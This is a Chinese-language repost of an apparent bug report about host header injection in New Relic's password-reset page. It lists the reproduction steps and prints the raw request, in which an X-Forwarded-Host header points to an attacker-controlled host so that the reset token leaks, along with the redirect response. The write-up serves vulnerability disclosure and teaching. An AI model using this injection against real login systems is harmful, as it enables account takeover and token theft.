业务背景
这是一个密码重置功能。
复现步骤
-
打开密码重置链接:
https://login.newrelic.com/passwords/forgot -
输入受害者的电子邮件地址,然后单击重置和电子邮件密码
-
在Burp Suite中拦截HTTP请求,并添加X-Forwarded主机标头并写入类似如下内容:
attacker.com/.newrelic.com
链接类似如下:
https://testing-now.000webhostapp.com/.newrelic.com/passwords/reset/a248d8b06e7b25a116859729cbc0e07e180d9fb197dadc04f30185512eecc811
受害者将在他们的电子邮件中收到恶意链接,当点击时,将泄露用户的密码重置链接/令牌给攻击者,导致帐户被完全接管。
请求是类似下面这样的:
POST /passwords/forgot HTTP/1.1
Host: login.newrelic.com
X-Forwarded-Host: testing-now.000webhostapp.com/.newrelic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 626
Connection: close
Referer: https://login.newrelic.com/passwords/forgot
Cookie: _ga=GA1.2.1721374031.1568844736; ajs_user_id=null; ajs_group_id=null; _gcl_au=1.1.1636905160.1568844739; ei_client_id=5d82b02df99b140010808282; _mkto_trk=id:412-MZS-894&token:_mch-newrelic.com-1568844750536-52713; _fbp=fb.1.1568844751467.1905354417; qca=P0-625668904-1568844751500; optimizelyEndUserId=oeu1568844783430r0.2931045891390677; ajs_anonymous_id=%22b1e86a3a-04a1-48f5-a1c9-37167a1991c8%22; s_fid=78F091CDC3B81C9E-153BD36510D98B56; intercom-id-cyym0u3i=9a67a50f-33f2-4fdb-b74f-7e8d058de750; adroll_fpc=8e6e5aa9e24ca0efac425a4b2c6d4c4e-s2-1568844790580; __ar_v4=YCNZVXZ6TJDJ3KMJRVGKFH%3A20190918%3A3%7CI7ZJI4CQMBCNHGOQ27AYQZ%3A20190918%3A3%7CDLQZ5QQWIFBZZM5ECJME6X%3A20190918%3A3; _golden_gate_session=DlKqVDqbL%2B6%2Fi298zevCA1yH1PgkIDlWIgCVNuUC2CbfqR55ZnQKWXdh8nIl2F3kP4u%2BC9gLAfxsg6jOWfPwuQVDa0GcDhR6VoddruVbqMGjdogry5tZvDs7K8BZkCVH49Z8KHpTXRAv7DJIjEePjX4LcqtNJzRs65Fm6Y97sFIzI4Hvm081ptYeD0Nk543GaLZMtTnT98Rgdu2nftfEV7PrfmqnXKUR%2FDHhVX%2BPjI0qjGZ3PyL3UX9EigZ%2BMcEFiFGPzQXKSW%2BAiVG4Y71rQBOfwm%2FlSz%2B8RGJ0WfEoL%2BBRDquU1w%2BOPxA2r3u8sU02xG4dg07nZeo%3D--SewvpLvUIyY0YJTh--bWuTrIMZhXu6MP8PDg2iZA%3D%3D
Upgrade-Insecure-Requests: 1
响应如下:
HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 134
Content-Type: text/html; charset=utf-8
Date: Fri, 20 Sep 2019 00:49:19 GMT
Location: https://testing-now.000webhostapp.com/.newrelic.com/passwords/forgot
Server: nginx
Set-Cookie: _golden_gate_session=Awolm37t0RVohChn8c%2FTtEpVzRz%2BYUXP%2FC6eqVDXqoY7IHMmItXq6vRR%2FLr45q31mXIOFUemqprmptlEuI2mIRy5ZN84OGsjWJWIUnZ34e0ve4IJf0Iqjh%2BbnsP0elEXQ%2B7gm12%2FRlfO4KSXZl7kkKcMrECZo8jQ%2B2SzO9cfYA6DcqNP%2BxlJkqQmQuF8eRXBqGwisVdIBtYqzHLzJDl6n7cZoXW9EyX%2FPMOAuJ3YlxUFoomKE6Z2%2BfgmCKPxeEQRtne%2BvtTJH5xzvNUnyN3JTSNVo4y47xZvjcnYLPzdW1vhptWGxtiyF99zy%2BCqrj11VlLz5PA4Idf0H8OmTqLvzVT42C40SN8qRtz1jP%2BhDjuwDsAr9aDabjj4O41F7AoivfsBXf0vJanmXOmllZXqRiLmiV81nTAEOi5S8EBDbkT3TLrkIu1Uuo2TdkXCDQXyasWXzg%2F1zRI08xOgr6IgdOJhxbZy6Se2ToIMbsYRA532mzLKFXPq2xCIU%2FTuEWdFyXbk4w%2Bo5qH6z21Qqibl32S7VgkN%2Fc61SYJcyipdyJsWWKT6lhHnv%2BHeCGi4OoE3wonpFRm9Z7pNDh%2BamsTtBUOCQgJeNYYnyz35Ggeueeo%2BVYqC46qNpedWs%2B9vXIH%2FRVQguzv9rfU%3D--MxbKlXOo06QW75kP--4a4Glp1aMgEoV2XXukgnIA%3D%3D; path=/; HttpOnly; secure; SameSite=Lax
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: DENY
X-Permitted-Cross-Domain-Policies: none
X-Request-Id: ec1ad038-4b96-4915-b107-3422151a3ab1
X-Runtime: 0.113080
X-Xss-Protection: 1; mode=block
Connection: close
<html><body>You are being <a href="https://testing-now.000webhostapp.com/.newrelic.com/passwords/forgot">redirected</a>.</body></html>
look at attachments
原文始发于微信公众号(迪哥讲事):利用主机头注入来进行账户劫持
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论